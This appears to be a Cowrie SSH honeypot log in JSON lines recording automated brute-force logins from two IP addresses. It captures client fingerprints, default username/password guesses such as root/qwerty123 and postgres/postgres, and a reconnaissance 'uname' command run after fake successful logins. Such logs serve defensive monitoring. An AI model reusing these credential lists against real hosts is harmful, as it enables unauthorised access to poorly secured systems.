{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:34:07.384465Z","src_ip":"212.227.125.160","session":"b48935f370d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46112,"dst_ip":"1.2.3.4","dst_port":22,"session":"2936d10c1c55","protocol":"ssh","message":"New connection: 212.227.125.160:46112 (1.2.3.4:22) [session: 2936d10c1c55]","sensor":"my-vps","timestamp":"2025-08-26T21:34:11.430211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:34:11.447941Z","src_ip":"212.227.125.160","session":"2936d10c1c55"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:34:11.514341Z","src_ip":"212.227.125.160","session":"2936d10c1c55"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:34:11.946972Z","src_ip":"212.227.125.160","session":"2936d10c1c55"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:34:12.227997Z","src_ip":"212.227.125.160","session":"2936d10c1c55"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:34:12.228989Z","src_ip":"212.227.125.160","session":"2936d10c1c55"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:34:12.282813Z","src_ip":"212.227.125.160","session":"2936d10c1c55"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:34:12.284074Z","src_ip":"212.227.125.160","session":"2936d10c1c55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44512,"dst_ip":"1.2.3.4","dst_port":22,"session":"b13f92e2634d","protocol":"ssh","message":"New connection: 212.227.235.229:44512 (1.2.3.4:22) [session: b13f92e2634d]","sensor":"my-vps","timestamp":"2025-08-26T21:34:12.561106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:34:13.562752Z","src_ip":"212.227.235.229","session":"b13f92e2634d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:34:13.563729Z","src_ip":"212.227.235.229","session":"b13f92e2634d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41498,"dst_ip":"1.2.3.4","dst_port":22,"session":"84e3b3b89d51","protocol":"ssh","message":"New connection: 212.227.125.160:41498 (1.2.3.4:22) [session: 84e3b3b89d51]","sensor":"my-vps","timestamp":"2025-08-26T21:34:17.133332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:34:17.140783Z","src_ip":"212.227.125.160","session":"84e3b3b89d51"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:34:17.200850Z","src_ip":"212.227.125.160","session":"84e3b3b89d51"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:34:17.498278Z","src_ip":"212.227.125.160","session":"84e3b3b89d51"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:34:17.598320Z","src_ip":"212.227.235.229","session":"b13f92e2634d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:34:17.723257Z","src_ip":"212.227.125.160","session":"84e3b3b89d51"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:34:17.724071Z","src_ip":"212.227.125.160","session":"84e3b3b89d51"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:34:17.800880Z","src_ip":"212.227.125.160","session":"84e3b3b89d51"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:34:17.802114Z","src_ip":"212.227.125.160","session":"84e3b3b89d51"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:34:20.072905Z","src_ip":"212.227.235.229","session":"b13f92e2634d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36886,"dst_ip":"1.2.3.4","dst_port":22,"session":"526da7dc7d46","protocol":"ssh","message":"New connection: 212.227.125.160:36886 (1.2.3.4:22) [session: 526da7dc7d46]","sensor":"my-vps","timestamp":"2025-08-26T21:34:22.701778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:34:22.745577Z","src_ip":"212.227.125.160","session":"526da7dc7d46"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:34:22.783479Z","src_ip":"212.227.125.160","session":"526da7dc7d46"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-26T21:34:23.442650Z","src_ip":"212.227.125.160","session":"526da7dc7d46"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:34:24.519962Z","src_ip":"212.227.125.160","session":"526da7dc7d46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60502,"dst_ip":"1.2.3.4","dst_port":22,"session":"71d610db1e74","protocol":"ssh","message":"New connection: 212.227.125.160:60502 (1.2.3.4:22) [session: 71d610db1e74]","sensor":"my-vps","timestamp":"2025-08-26T21:34:29.456320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:34:29.493549Z","src_ip":"212.227.125.160","session":"71d610db1e74"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:34:29.578092Z","src_ip":"212.227.125.160","session":"71d610db1e74"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-26T21:34:31.740364Z","src_ip":"212.227.125.160","session":"71d610db1e74"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:34:32.864110Z","src_ip":"212.227.125.160","session":"71d610db1e74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55890,"dst_ip":"1.2.3.4","dst_port":22,"session":"71b41a197203","protocol":"ssh","message":"New connection: 212.227.125.160:55890 (1.2.3.4:22) [session: 71b41a197203]","sensor":"my-vps","timestamp":"2025-08-26T21:34:36.914404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:34:36.915373Z","src_ip":"212.227.125.160","session":"71b41a197203"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:34:37.287446Z","src_ip":"212.227.125.160","session":"71b41a197203"}
{"eventid":"cowrie.login.failed","username":"nobody","password":"nobody","message":"login attempt [nobody/nobody] failed","sensor":"my-vps","timestamp":"2025-08-26T21:34:38.095641Z","src_ip":"212.227.125.160","session":"71b41a197203"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:34:39.399808Z","src_ip":"212.227.125.160","session":"71b41a197203"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51276,"dst_ip":"1.2.3.4","dst_port":22,"session":"09f8f2f8e569","protocol":"ssh","message":"New connection: 212.227.125.160:51276 (1.2.3.4:22) [session: 09f8f2f8e569]","sensor":"my-vps","timestamp":"2025-08-26T21:34:42.069942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:34:42.074776Z","src_ip":"212.227.125.160","session":"09f8f2f8e569"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:34:42.119494Z","src_ip":"212.227.125.160","session":"09f8f2f8e569"}
{"eventid":"cowrie.login.failed","username":"news","password":"news","message":"login attempt [news/news] failed","sensor":"my-vps","timestamp":"2025-08-26T21:34:42.297765Z","src_ip":"212.227.125.160","session":"09f8f2f8e569"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:34:43.398185Z","src_ip":"212.227.125.160","session":"09f8f2f8e569"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46664,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc6bdf6a05c0","protocol":"ssh","message":"New connection: 212.227.125.160:46664 (1.2.3.4:22) [session: cc6bdf6a05c0]","sensor":"my-vps","timestamp":"2025-08-26T21:34:47.731548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:34:47.757768Z","src_ip":"212.227.125.160","session":"cc6bdf6a05c0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:34:47.792906Z","src_ip":"212.227.125.160","session":"cc6bdf6a05c0"}
{"eventid":"cowrie.login.failed","username":"aporaudio","password":"aporaudio","message":"login attempt [aporaudio/aporaudio] failed","sensor":"my-vps","timestamp":"2025-08-26T21:34:48.054290Z","src_ip":"212.227.125.160","session":"cc6bdf6a05c0"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:34:49.169760Z","src_ip":"212.227.125.160","session":"cc6bdf6a05c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42050,"dst_ip":"1.2.3.4","dst_port":22,"session":"17867e3b58a5","protocol":"ssh","message":"New connection: 212.227.125.160:42050 (1.2.3.4:22) [session: 17867e3b58a5]","sensor":"my-vps","timestamp":"2025-08-26T21:34:53.182250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:34:53.197659Z","src_ip":"212.227.125.160","session":"17867e3b58a5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:34:53.234700Z","src_ip":"212.227.125.160","session":"17867e3b58a5"}
{"eventid":"cowrie.login.failed","username":"sysadmin","password":"sysadmin","message":"login attempt [sysadmin/sysadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:34:53.707254Z","src_ip":"212.227.125.160","session":"17867e3b58a5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:34:54.844287Z","src_ip":"212.227.125.160","session":"17867e3b58a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37436,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6fcced5a72d","protocol":"ssh","message":"New connection: 212.227.125.160:37436 (1.2.3.4:22) [session: d6fcced5a72d]","sensor":"my-vps","timestamp":"2025-08-26T21:35:00.006684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:35:00.014098Z","src_ip":"212.227.125.160","session":"d6fcced5a72d"}
